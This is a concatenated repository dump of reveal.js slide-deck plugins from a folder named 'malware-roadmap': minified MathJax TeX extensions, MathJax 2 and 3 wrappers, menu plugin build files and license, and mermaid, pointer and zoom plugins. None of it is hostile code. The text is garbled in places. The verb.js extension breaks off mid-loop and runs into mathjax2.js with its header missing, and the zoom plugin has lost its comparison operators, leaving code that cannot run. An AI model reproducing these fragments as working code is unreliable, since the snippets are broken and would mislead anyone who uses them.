++s;i.TagsFactory.add(e,a),o.parseOptions.options.tags=e}o.tagformatConfig=u,o.TagFormatConfiguration=e.Configuration.create("tagformat",{config:[u,10],options:{tagformat:{number:function(t){return t.toString()},tag:function(t){return"("+t+")"},id:function(t){return"mjx-eqn:"+t.replace(/\s/g,"_")},url:function(t,o){return o+"#"+encodeURIComponent(t)}}}})},955:function(t,o){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,o.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(t,o){Object.defineProperty(o,"__esModule",{value:!0}),o.Configuration=MathJax._.input.tex.Configuration.Configuration,o.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,o.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},680:function(t,o){Object.defineProperty(o,"__esModule",{value:!0}),o.Label=MathJax._.input.tex.Tags.Label,o.TagInfo=MathJax._.input.tex.Tags.TagInfo,o.AbstractTags=MathJax._.input.tex.Tags.AbstractTags,o.NoTags=MathJax._.input.tex.Tags.NoTags,o.AllTags=MathJax._.input.tex.Tags.AllTags,o.TagsFactory=MathJax._.input.tex.Tags.TagsFactory}},a={};function r(t){var o=a[t];if(void 0!==o)return o.exports;var e=a[t]={exports:{}};return n[t].call(e.exports,e,e.exports,r),e.exports}t=r(955),o=r(941),(0,t.r8)({_:{input:{tex:{tagformat:{TagFormatConfiguration:o}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/unicode.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var t,e,a={376:function(t,e,a){Object.defineProperty(e,"__esModule",{value:!0}),e.UnicodeConfiguration=e.UnicodeMethods=void 0;var n=a(251),o=a(402),i=a(871),r=a(398),u=a(748),l=a(992);e.UnicodeMethods={};var c={};e.UnicodeMethods.Unicode=function(t,e){var a=t.GetBrackets(e),n=null,i=null;a&&(a.replace(/ /g,"").match(/^(\d+(\.\d*)?|\.\d+),(\d+(\.\d*)?|\.\d+)$/)?(n=a.replace(/ /g,"").split(/,/),i=t.GetBrackets(e)):i=a);var p=r.default.trimSpaces(t.GetArgument(e)).replace(/^0x/,"x");if(!p.match(/^(x[0-9A-Fa-f]+|[0-9]+)$/))throw new o.default("BadUnicode","Argument to \\unicode must be a number");var M=parseInt(p.match(/^x/)?"0"+p:p);c[M]?i||(i=c[M][2]):c[M]=[800,200,i,M],n&&(c[M][0]=Math.floor(1e3*parseFloat(n[0])),c[M][1]=Math.floor(1e3*parseFloat(n[1])));var d=t.stack.env.font,s={};i?(c[M][2]=s.fontfamily=i.replace(/'/g,"'"),d&&(d.match(/bold/)&&(s.fontweight="bold"),d.match(/italic|-mathit/)&&(s.fontstyle="italic"))):d&&(s.mathvariant=d);var x=t.create("token","mtext",s,l.numeric(p));u.default.setProperty(x,"unicode",!0),t.Push(x)},new i.CommandMap("unicode",{unicode:"Unicode"},e.UnicodeMethods),e.UnicodeConfiguration=n.Configuration.create("unicode",{handler:{macro:["unicode"]}})},955:function(t,e){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,e.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},992:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.options=MathJax._.util.Entities.options,e.entities=MathJax._.util.Entities.entities,e.add=MathJax._.util.Entities.add,e.remove=MathJax._.util.Entities.remove,e.translate=MathJax._.util.Entities.translate,e.numeric=MathJax._.util.Entities.numeric},251:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.Configuration=MathJax._.input.tex.Configuration.Configuration,e.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,e.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},748:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.default=MathJax._.input.tex.NodeUtil.default},398:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.default=MathJax._.input.tex.ParseUtil.default},871:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,e.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,e.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,e.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,e.DelimiterMap=MathJax._.input.tex.SymbolMap.DelimiterMap,e.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,e.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,e.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap},402:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.default=MathJax._.input.tex.TexError.default}},n={};function o(t){var e=n[t];if(void 0!==e)return e.exports;var i=n[t]={exports:{}};return a[t](i,i.exports,o),i.exports}t=o(955),e=o(376),(0,t.r8)({_:{input:{tex:{unicode:{UnicodeConfiguration:e}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/upgreek.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var a,t,p={927:function(a,t,p){Object.defineProperty(t,"__esModule",{value:!0}),t.UpgreekConfiguration=void 0;var e=p(251),n=p(871),o=p(108);new n.CharacterMap("upgreek",(function(a,t){var p=t.attributes||{};p.mathvariant=o.TexConstant.Variant.NORMAL;var e=a.create("token","mi",p,t.char);a.Push(e)}),{upalpha:"\u03b1",upbeta:"\u03b2",upgamma:"\u03b3",updelta:"\u03b4",upepsilon:"\u03f5",upzeta:"\u03b6",upeta:"\u03b7",uptheta:"\u03b8",upiota:"\u03b9",upkappa:"\u03ba",uplambda:"\u03bb",upmu:"\u03bc",upnu:"\u03bd",upxi:"\u03be",upomicron:"\u03bf",uppi:"\u03c0",uprho:"\u03c1",upsigma:"\u03c3",uptau:"\u03c4",upupsilon:"\u03c5",upphi:"\u03d5",upchi:"\u03c7",uppsi:"\u03c8",upomega:"\u03c9",upvarepsilon:"\u03b5",upvartheta:"\u03d1",upvarpi:"\u03d6",upvarrho:"\u03f1",upvarsigma:"\u03c2",upvarphi:"\u03c6",Upgamma:"\u0393",Updelta:"\u0394",Uptheta:"\u0398",Uplambda:"\u039b",Upxi:"\u039e",Uppi:"\u03a0",Upsigma:"\u03a3",Upupsilon:"\u03a5",Upphi:"\u03a6",Uppsi:"\u03a8",Upomega:"\u03a9"}),t.UpgreekConfiguration=e.Configuration.create("upgreek",{handler:{macro:["upgreek"]}})},955:function(a,t){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,t.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.Configuration=MathJax._.input.tex.Configuration.Configuration,t.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,t.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},871:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,t.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,t.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,t.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,t.DelimiterMap=MathJax._.input.tex.SymbolMap.DelimiterMap,t.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,t.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,t.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap},108:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.TexConstant=MathJax._.input.tex.TexConstants.TexConstant}},e={};function n(a){var t=e[a];if(void 0!==t)return t.exports;var o=e[a]={exports:{}};return p[a](o,o.exports,n),o.exports}a=n(955),t=n(927),(0,a.r8)({_:{input:{tex:{upgreek:{UpgreekConfiguration:t}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/verb.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var t,a,e={768:function(t,a,e){Object.defineProperty(a,"__esModule",{value:!0}),a.VerbConfiguration=a.VerbMethods=void 0;var n=e(251),o=e(108),r=e(871),i=e(402);a.VerbMethods={},a.VerbMethods.Verb=function(t,a){var e=t.GetNext(),n=++t.i;if(""===e)throw new i.default("MissingArgFor","Missing argument for %1",a);for(;t.i { 8 | 9 | // The reveal.js instance this plugin is attached to 10 | let deck; 11 | 12 | let defaultOptions = { 13 | messageStyle: 'none', 14 | tex2jax: { 15 | inlineMath: [ [ '$', '$' ], [ '\\(', '\\)' ] ], 16 | skipTags: [ 'script', 'noscript', 'style', 'textarea', 'pre' ] 17 | }, 18 | skipStartupTypeset: true 19 | }; 20 | 21 | function loadScript( url, callback ) { 22 | 23 | let head = document.querySelector( 'head' ); 24 | let script = document.createElement( 'script' ); 25 | script.type = 'text/javascript'; 26 | script.src = url; 27 | 28 | // Wrapper for callback to make sure it only fires once 29 | let finish = () => { 30 | if( typeof callback === 'function' ) { 31 | callback.call(); 32 | callback = null; 33 | } 34 | } 35 | 36 | script.onload = finish; 37 | 38 | // IE 39 | script.onreadystatechange = () => { 40 | if ( this.readyState === 'loaded' ) { 41 | finish(); 42 | } 43 | } 44 | 45 | // Normal browsers 46 | head.appendChild( script ); 47 | 48 | } 49 | 50 | return { 51 | id: 'mathjax2', 52 | 53 | init: function( reveal ) { 54 | 55 | deck = reveal; 56 | 57 | let revealOptions = deck.getConfig().mathjax2 || deck.getConfig().math || {}; 58 | 59 | let options = { ...defaultOptions, ...revealOptions }; 60 | let mathjax = options.mathjax || 'https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js'; 61 | let config = options.config || 'TeX-AMS_HTML-full'; 62 | let url = mathjax + '?config=' + config; 63 | 64 | options.tex2jax = { ...defaultOptions.tex2jax, ...revealOptions.tex2jax }; 65 | 66 | options.mathjax = options.config = null; 67 | 68 | loadScript( url, function() { 69 | 70 | MathJax.Hub.Config( options ); 71 | 72 | // Typeset followed by an immediate reveal.js layout since 73 | // the typesetting process could affect slide height 74 | MathJax.Hub.Queue( [ 'Typeset', MathJax.Hub, deck.getRevealElement() ] ); 75 | MathJax.Hub.Queue( deck.layout ); 76 | 77 | // Reprocess equations in slides when they turn visible 78 | deck.on( 'slidechanged', function( event ) { 79 | 80 | MathJax.Hub.Queue( [ 'Typeset', MathJax.Hub, event.currentSlide ] ); 81 | 82 | } ); 83 | 84 | } ); 85 | 86 | } 87 | } 88 | 89 | }; 90 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax3.js: -------------------------------------------------------------------------------- 1 | /** 2 | * A plugin which enables rendering of math equations inside 3 | * of reveal.js slides. Essentially a thin wrapper for MathJax 3 4 | * 5 | * @author Hakim El Hattab 6 | * @author Gerhard Burger 7 | */ 8 | export const MathJax3 = () => { 9 | 10 | // The reveal.js instance this plugin is attached to 11 | let deck; 12 | 13 | let defaultOptions = { 14 | tex: { 15 | inlineMath: [ [ '$', '$' ], [ '\\(', '\\)' ] ] 16 | }, 17 | options: { 18 | skipHtmlTags: [ 'script', 'noscript', 'style', 'textarea', 'pre' ] 19 | }, 20 | startup: { 21 | ready: () => { 22 | MathJax.startup.defaultReady(); 23 | MathJax.startup.promise.then(() => { 24 | Reveal.layout(); 25 | }); 26 | } 27 | } 28 | }; 29 | 30 | function loadScript( url, callback ) { 31 | 32 | let script = document.createElement( 'script' ); 33 | script.type = "text/javascript" 34 | script.id = "MathJax-script" 35 | script.src = url; 36 | script.async = true 37 | 38 | // Wrapper for callback to make sure it only fires once 39 | script.onload = () => { 40 | if (typeof callback === 'function') { 41 | callback.call(); 42 | callback = null; 43 | } 44 | }; 45 | 46 | document.head.appendChild( script ); 47 | 48 | } 49 | 50 | return { 51 | id: 'mathjax3', 52 | init: function(reveal) { 53 | 54 | deck = reveal; 55 | 56 | let revealOptions = deck.getConfig().mathjax3 || {}; 57 | let options = {...defaultOptions, ...revealOptions}; 58 | options.tex = {...defaultOptions.tex, ...revealOptions.tex} 59 | options.options = {...defaultOptions.options, ...revealOptions.options} 60 | options.startup = {...defaultOptions.startup, ...revealOptions.startup} 61 | 62 | let url = options.mathjax || 'https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js'; 63 | options.mathjax = null; 64 | 65 | window.MathJax = options; 66 | 67 | loadScript( url, function() { 68 | // Reprocess equations in slides when they turn visible 69 | Reveal.addEventListener( 'slidechanged', function( event ) { 70 | MathJax.typeset(); 71 | } ); 72 | } ); 73 | 74 | } 75 | } 76 | 77 | }; 78 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/plugin.js: -------------------------------------------------------------------------------- 1 | import {KaTeX} from "./katex"; 2 | import {MathJax2} from "./mathjax2"; 3 | import {MathJax3} from "./mathjax3"; 4 | 5 | const defaultTypesetter = MathJax2; 6 | 7 | /*! 8 | * This plugin is a wrapper for the MathJax2, 9 | * MathJax3 and KaTeX typesetter plugins. 10 | */ 11 | export default Plugin = Object.assign( defaultTypesetter(), { 12 | KaTeX, 13 | MathJax2, 14 | MathJax3 15 | } ); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/menu/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | ## Contributing 2 | 3 | ### Bug Reports 4 | When reporting a bug make sure to include information about which browser and operating system you are on as well as the necessary steps to reproduce the issue. If possible please include a link to a sample presentation where the bug can be tested. 5 | 6 | ### Pull Requests 7 | - Should follow the coding style of the file you work in 8 | - Should be made towards the **dev branch** 9 | - Should be submitted from a feature/topic branch (not your master) 10 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/menu/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (C) 2020 Greg Denehy 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy 4 | of this software and associated documentation files (the "Software"), to deal 5 | in the Software without restriction, including without limitation the rights 6 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 7 | copies of the Software, and to permit persons to whom the Software is 8 | furnished to do so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in 11 | all copies or substantial portions of the Software. 12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN 19 | THE SOFTWARE. -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/menu/bower.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "reveal.js-menu", 3 | "version": "2.1.0", 4 | "homepage": "https://denehyg.github.io/reveal.js-menu", 5 | "authors": ["Greg Denehy"], 6 | "description": "A slideout menu for navigating reveal.js presentations", 7 | "keywords": ["reveal", "menu"], 8 | "license": "MIT, Copyright (C) 2020 Greg Denehy", 9 | "ignore": ["**/.*", "node_modules", "bower_components", "test", "tests"] 10 | } 11 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/menu/gulpfile.js: -------------------------------------------------------------------------------- 1 | const pkg = require('./package.json'); 2 | 3 | const { rollup } = require('rollup'); 4 | const { terser } = require('rollup-plugin-terser'); 5 | const babel = require('@rollup/plugin-babel').default; 6 | const commonjs = require('@rollup/plugin-commonjs'); 7 | const resolve = require('@rollup/plugin-node-resolve').default; 8 | 9 | const gulp = require('gulp'); 10 | 11 | const banner = `/*! 12 | * reveal.js-menu ${pkg.version} 13 | * ${pkg.homepage} 14 | * MIT licensed 15 | * 16 | * Copyright (C) 2016 Greg Denehy 17 | */\n`; 18 | 19 | const babelConfig = { 20 | babelHelpers: 'bundled', 21 | ignore: ['node_modules'], 22 | compact: false, 23 | extensions: ['.js', '.html'], 24 | plugins: ['transform-html-import-to-string'], 25 | presets: [ 26 | [ 27 | '@babel/preset-env', 28 | { 29 | corejs: 3, 30 | useBuiltIns: 'usage', 31 | modules: false 32 | } 33 | ] 34 | ] 35 | }; 36 | 37 | // Our ES module bundle only targets newer browsers with 38 | // module support. Browsers are targeted explicitly instead 39 | // of using the "esmodule: true" target since that leads to 40 | // polyfilling older browsers and a larger bundle. 41 | const babelConfigESM = JSON.parse(JSON.stringify(babelConfig)); 42 | babelConfigESM.presets[0][1].targets = { 43 | browsers: [ 44 | 'last 2 Chrome versions', 45 | 'not Chrome < 60', 46 | 'last 2 Safari versions', 47 | 'not Safari < 10.1', 48 | 'last 2 iOS versions', 49 | 'not iOS < 10.3', 50 | 'last 2 Firefox versions', 51 | 'not Firefox < 60', 52 | 'last 2 Edge versions', 53 | 'not Edge < 16' 54 | ] 55 | }; 56 | 57 | let cache = {}; 58 | 59 | // Creates a UMD and ES module bundle for each plugin 60 | gulp.task('build', () => { 61 | return Promise.all( 62 | [ 63 | { 64 | name: 'RevealMenu', 65 | input: './plugin.js', 66 | output: './menu' 67 | } 68 | ].map(plugin => { 69 | return rollup({ 70 | cache: cache[plugin.input], 71 | input: plugin.input, 72 | plugins: [ 73 | resolve(), 74 | commonjs(), 75 | babel({ 76 | ...babelConfig, 77 | ignore: [/node_modules\/.*/] 78 | }), 79 | terser() 80 | ] 81 | }).then(bundle => { 82 | cache[plugin.input] = bundle.cache; 83 | bundle.write({ 84 | file: plugin.output + '.esm.js', 85 | name: plugin.name, 86 | format: 'es' 87 | }); 88 | 89 | bundle.write({ 90 | file: plugin.output + '.js', 91 | name: plugin.name, 92 | format: 'umd' 93 | }); 94 | }); 95 | }) 96 | ); 97 | }); 98 | 99 | gulp.task('default', gulp.series('build')); 100 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/menu/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "reveal.js-menu", 3 | "version": "2.1.0", 4 | "description": "A slideout menu for navigating reveal.js presentations", 5 | "scripts": { 6 | "test": "echo \"Error: no test specified\" && exit 1", 7 | "build": "gulp" 8 | }, 9 | "repository": { 10 | "type": "git", 11 | "url": "git+https://github.com/denehyg/reveal.js-menu.git" 12 | }, 13 | "keywords": [ 14 | "reveal", 15 | "menu" 16 | ], 17 | "author": "Greg Denehy", 18 | "license": "MIT, Copyright (C) 2020 Greg Denehy", 19 | "bugs": { 20 | "url": "https://github.com/denehyg/reveal.js-menu/issues" 21 | }, 22 | "homepage": "https://github.com/denehyg/reveal.js-menu#readme", 23 | "devDependencies": { 24 | "@babel/core": "^7.10.4", 25 | "@babel/preset-env": "^7.10.4", 26 | "@rollup/plugin-babel": "^5.0.4", 27 | "@rollup/plugin-commonjs": "^13.0.0", 28 | "@rollup/plugin-node-resolve": "^8.1.0", 29 | "babel-plugin-transform-html-import-to-string": "0.0.1", 30 | "core-js": "^3.6.5", 31 | "gulp": "^4.0.2", 32 | "rollup": "^2.21.0", 33 | "rollup-plugin-terser": "^6.1.0" 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/mermaid/plugin.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * reveal.js Mermaid plugin 3 | */ 4 | 5 | import mermaid from "mermaid"; 6 | 7 | const Plugin = { 8 | id: "mermaid", 9 | 10 | init: function (reveal) { 11 | 12 | let { ...mermaidConfig } = reveal.getConfig().mermaid || {}; 13 | 14 | mermaid.mermaidAPI.initialize({ 15 | // The node size will be calculated incorrectly if set `startOnLoad: start`, 16 | // so we need to manually render. 17 | startOnLoad: false, 18 | ...mermaidConfig, 19 | }); 20 | 21 | const mermaidEls = reveal.getRevealElement().querySelectorAll(".mermaid"); 22 | 23 | Array.from(mermaidEls).forEach(function (el) { 24 | var insertSvg = function (svgCode, bindFunctions) { 25 | el.innerHTML = svgCode; 26 | }; 27 | 28 | var graphDefinition = el.textContent.trim(); 29 | 30 | try { 31 | mermaid.mermaidAPI.render( 32 | `mermaid-${Math.random().toString(36).substring(2)}`, 33 | graphDefinition, 34 | insertSvg 35 | ); 36 | } catch (error) { 37 | let errorStr = ""; 38 | if (error?.str) { 39 | // From mermaid 9.1.4, error.message does not exists anymore 40 | errorStr = error.str; 41 | } 42 | if (error?.message) { 43 | errorStr = error.message; 44 | } 45 | console.error(errorStr, { error, graphDefinition, el }); 46 | el.innerHTML = errorStr; 47 | } 48 | }); 49 | }, 50 | }; 51 | 52 | export default () => Plugin; 53 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/reveal-pointer/pointer.css: -------------------------------------------------------------------------------- 1 | .cursor-dot,.cursor-dot-outline{pointer-events:none;position:absolute;top:0;left:0;border-radius:50%;opacity:0;transform:translate(-50%,-50%);transition:opacity 0.3s ease-in-out,transform 0.3s ease-in-out;}.cursor-dot{width:12px;height:12px;background-color:red;z-index:1;}.no-cursor{cursor:none;}.no-cursor a,.no-cursor div,.no-cursor span{cursor:none;} -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/reveal-pointer/pointer.js: -------------------------------------------------------------------------------- 1 | var RevealPointer=function(){"use strict";var e={backspace:8,tab:9,enter:13,shift:16,ctrl:17,alt:18,pausebreak:19,capslock:20,esc:27,space:32,pageup:33,pagedown:34,end:35,home:36,leftarrow:37,uparrow:38,rightarrow:39,downarrow:40,insert:45,delete:46,0:48,1:49,2:50,3:51,4:52,5:53,6:54,7:55,8:56,9:57,a:65,b:66,c:67,d:68,e:69,f:70,g:71,h:72,i:73,j:74,k:75,l:76,m:77,n:78,o:79,p:80,q:81,r:82,s:83,t:84,u:85,v:86,w:87,x:88,y:89,z:90,leftwindowkey:91,rightwindowkey:92,selectkey:93,numpad0:96,numpad1:97,numpad2:98,numpad3:99,numpad4:100,numpad5:101,numpad6:102,numpad7:103,numpad8:104,numpad9:105,multiply:106,add:107,subtract:109,decimalpoint:110,divide:111,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123,numlock:144,scrolllock:145,semicolon:186,equalsign:187,comma:188,dash:189,period:190,forwardslash:191,graveaccent:192,openbracket:219,backslash:220,closebracket:221,singlequote:222};return function(){var t={},o=!1,n=null,a={x:0,y:0,isVisible:!1},i={x:0,y:0,scale:1};function l(o){var n;null==(t=o.pointer||{}).key?t.key="q":t.key=t.key.toLowerCase(),null!=t.pointerSize&&"number"==typeof t.pointerSize||(t.pointerSize=12),null!=t.tailLength&&"number"==typeof t.tailLength||(t.tailLength=10),null!=t.color&&"string"==typeof t.color||(t.color="red"),null!=t.alwaysVisible&&"boolean"==typeof t.alwaysVisible||(t.alwaysVisible=!1),null!=t.opacity&&"number"==typeof t.opacity||(t.opacity=.8),t.keyCode=(n=t.key,e[n])}function r(){n.style.top="".concat((a.y-i.y)/i.scale,"px"),n.style.left="".concat((a.x-i.x)/i.scale,"px"),a.isVisible?n.style.opacity=t.opacity.toString():n.style.opacity="0",1!==i.scale?(n.style.width="".concat(t.pointerSize/i.scale,"px"),n.style.height="".concat(t.pointerSize/i.scale,"px")):(n.style.width="".concat(t.pointerSize,"px"),n.style.height="".concat(t.pointerSize,"px"))}function c(e){a.x=e.pageX,a.y=e.pageY;var t=document.body.style.transform;""!==t?(i.x=Number.parseInt(/translate\((.*)px,/gm.exec(t)[1]),i.y=Number.parseInt(/px,\s(.*)px\)/gm.exec(t)[1]),i.scale=Number.parseFloat(/scale\((.)\)/gm.exec(t)[1])):(i.x=0,i.y=0,i.scale=1),requestAnimationFrame(r)}function s(){(o=!o)?(document.addEventListener("mousemove",c),document.body.classList.add("no-cursor"),a.isVisible=!0):(document.removeEventListener("mousemove",c),document.body.classList.remove("no-cursor"),a.isVisible=!1,requestAnimationFrame(r))}return{id:"pointer",init:function(e){var o;l(e.getConfig()),t.alwaysVisible?s():e.addKeyBinding({keyCode:t.keyCode,key:t.key},(function(){s()})),e.on("pointerColorChange",(function(e){var o;o=e.color,null!=n&&(n.style.backgroundColor=null!=o?o:t.color)})),(o=document.createElement("div")).className="cursor-dot",o.style.width="".concat(t.pointerSize,"px"),o.style.height="".concat(t.pointerSize,"px"),o.style.backgroundColor=t.color,t.alwaysVisible&&(o.style.opacity="0.8"),document.body.appendChild(o),n=o}}}}(); 2 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/zoom/zoom.esm.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * reveal.js Zoom plugin 3 | */ 4 | var e={id:"zoom",init:function(e){e.getRevealElement().addEventListener("mousedown",(function(n){var o=/Linux/.test(window.navigator.platform)?"ctrl":"alt",i=(e.getConfig().zoomKey?e.getConfig().zoomKey:o)+"Key",d=e.getConfig().zoomLevel?e.getConfig().zoomLevel:2;n[i]&&!e.isOverview()&&(n.preventDefault(),t.to({x:n.clientX,y:n.clientY,scale:d,pan:!1}))}))},destroy:function(){t.reset()}},t=function(){var e=1,n=0,o=0,i=-1,d=-1,l="transform"in document.body.style;function s(t,n){var o=r();if(t.width=t.width||1,t.height=t.height||1,t.x-=(window.innerWidth-t.width*n)/2,t.y-=(window.innerHeight-t.height*n)/2,l)if(1===n)document.body.style.transform="";else{var i=o.x+"px "+o.y+"px",d="translate("+-t.x+"px,"+-t.y+"px) scale("+n+")";document.body.style.transformOrigin=i,document.body.style.transform=d}else 1===n?(document.body.style.position="",document.body.style.left="",document.body.style.top="",document.body.style.width="",document.body.style.height="",document.body.style.zoom=""):(document.body.style.position="relative",document.body.style.left=-(o.x+t.x)/n+"px",document.body.style.top=-(o.y+t.y)/n+"px",document.body.style.width=100*n+"%",document.body.style.height=100*n+"%",document.body.style.zoom=n);e=n,document.documentElement.classList&&(1!==e?document.documentElement.classList.add("zoomed"):document.documentElement.classList.remove("zoomed"))}function c(){var t=.12*window.innerWidth,i=.12*window.innerHeight,d=r();owindow.innerHeight-i&&window.scroll(d.x,d.y+(1-(window.innerHeight-o)/i)*(14/e)),nwindow.innerWidth-t&&window.scroll(d.x+(1-(window.innerWidth-n)/t)*(14/e),d.y)}function r(){return{x:void 0!==window.scrollX?window.scrollX:window.pageXOffset,y:void 0!==window.scrollY?window.scrollY:window.pageYOffset}}return l&&(document.body.style.transition="transform 0.8s ease"),document.addEventListener("keyup",(function(n){1!==e&&27===n.keyCode&&t.out()})),document.addEventListener("mousemove",(function(t){1!==e&&(n=t.clientX,o=t.clientY)})),{to:function(n){if(1!==e)t.out();else{if(n.x=n.x||0,n.y=n.y||0,n.element){var o=n.element.getBoundingClientRect();n.x=o.left-20,n.y=o.top-20,n.width=o.width+40,n.height=o.height+40}void 0!==n.width&&void 0!==n.height&&(n.scale=Math.max(Math.min(window.innerWidth/n.width,window.innerHeight/n.height),1)),n.scale>1&&(n.x*=n.scale,n.y*=n.scale,s(n,n.scale),!1!==n.pan&&(i=setTimeout((function(){d=setInterval(c,1e3/60)}),800)))}},out:function(){clearTimeout(i),clearInterval(d),s({x:0,y:0},1),e=1},magnify:function(e){this.to(e)},reset:function(){this.out()},zoomLevel:function(){return e}}}();export default function(){return e} 5 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/zoom/zoom.js: -------------------------------------------------------------------------------- 1 | !function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).RevealZoom=t()}(this,(function(){"use strict"; 2 | /*! 3 | * reveal.js Zoom plugin 4 | */var e={id:"zoom",init:function(e){e.getRevealElement().addEventListener("mousedown",(function(o){var n=/Linux/.test(window.navigator.platform)?"ctrl":"alt",i=(e.getConfig().zoomKey?e.getConfig().zoomKey:n)+"Key",d=e.getConfig().zoomLevel?e.getConfig().zoomLevel:2;o[i]&&!e.isOverview()&&(o.preventDefault(),t.to({x:o.clientX,y:o.clientY,scale:d,pan:!1}))}))},destroy:function(){t.reset()}},t=function(){var e=1,o=0,n=0,i=-1,d=-1,l="transform"in document.body.style;function s(t,o){var n=r();if(t.width=t.width||1,t.height=t.height||1,t.x-=(window.innerWidth-t.width*o)/2,t.y-=(window.innerHeight-t.height*o)/2,l)if(1===o)document.body.style.transform="";else{var i=n.x+"px "+n.y+"px",d="translate("+-t.x+"px,"+-t.y+"px) scale("+o+")";document.body.style.transformOrigin=i,document.body.style.transform=d}else 1===o?(document.body.style.position="",document.body.style.left="",document.body.style.top="",document.body.style.width="",document.body.style.height="",document.body.style.zoom=""):(document.body.style.position="relative",document.body.style.left=-(n.x+t.x)/o+"px",document.body.style.top=-(n.y+t.y)/o+"px",document.body.style.width=100*o+"%",document.body.style.height=100*o+"%",document.body.style.zoom=o);e=o,document.documentElement.classList&&(1!==e?document.documentElement.classList.add("zoomed"):document.documentElement.classList.remove("zoomed"))}function c(){var t=.12*window.innerWidth,i=.12*window.innerHeight,d=r();nwindow.innerHeight-i&&window.scroll(d.x,d.y+(1-(window.innerHeight-n)/i)*(14/e)),owindow.innerWidth-t&&window.scroll(d.x+(1-(window.innerWidth-o)/t)*(14/e),d.y)}function r(){return{x:void 0!==window.scrollX?window.scrollX:window.pageXOffset,y:void 0!==window.scrollY?window.scrollY:window.pageYOffset}}return l&&(document.body.style.transition="transform 0.8s 